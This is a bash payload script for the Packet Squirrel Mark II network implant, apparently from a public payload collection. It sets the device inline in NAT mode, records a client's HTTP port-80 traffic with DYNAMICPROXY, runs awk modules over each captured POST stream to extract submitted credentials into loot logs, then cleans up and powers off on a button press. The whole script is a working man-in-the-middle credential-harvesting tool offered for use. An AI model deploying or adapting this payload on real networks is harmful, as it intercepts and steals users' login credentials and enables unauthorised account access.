#!/bin/bash
#
# Title:            Capturing Credentials Submitted via HTTP
# Description:
#                   This payload uses inotifywait and DYNAMICPROXY
#                   to monitor the HTTP POST data streams generated
#                   by a client and extract sensitive information using awk.
#
# Author:           TW-D
# Version:          1.0
# Category:         Credentials
# Prerequisites:
# - Packet Squirrel Mark II
#
# Netmode:          NAT
#
# STATUS
# ================
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Waiting for a button press ...................... OFF
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#

######## CONSTANTS ########

PAYLOAD_SWITCH="/root/payloads/$(SWITCH)"
readonly PAYLOAD_SWITCH

readonly PAYLOAD_LOOTS="${PAYLOAD_SWITCH}/loots"
readonly LOOTS_CREDENTIALS="${PAYLOAD_LOOTS}/credentials"
readonly LOOTS_STREAMS="${PAYLOAD_LOOTS}/streams"
readonly PAYLOAD_MODULES="${PAYLOAD_SWITCH}/modules"

###########################

set -u

LED SETUP

NETMODE NAT

if [[ ! -d "${PAYLOAD_LOOTS}" ]]; then
    mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"
fi

LED ATTACK

credentials_search() {
    inotifywait --monitor --format '%w%f' --event close_write "${LOOTS_STREAMS}" | while read -r dynamicproxy_stream; do
        if [[ -f "${dynamicproxy_stream}" ]]; then
            case "${dynamicproxy_stream}" in
                *_CLIENT.stream)
                    for awk_module in "${PAYLOAD_MODULES}"/*.awk; do
                        awk -f "${awk_module}" "${dynamicproxy_stream}"
                    done
                    ;;
            esac
            rm "${dynamicproxy_stream}"
        fi
    done
}
credentials_search &> "${LOOTS_CREDENTIALS}/$(date +%s).log" &
cs_pid="${!}"

DYNAMICPROXY CLIENT "${LOOTS_STREAMS}/http_" 80 &
dp_pid="${!}"

LED OFF

NO_LED=1 BUTTON

LED CLEANUP

kill "${dp_pid}" "${cs_pid}"
sync

LED FINISH

poweroff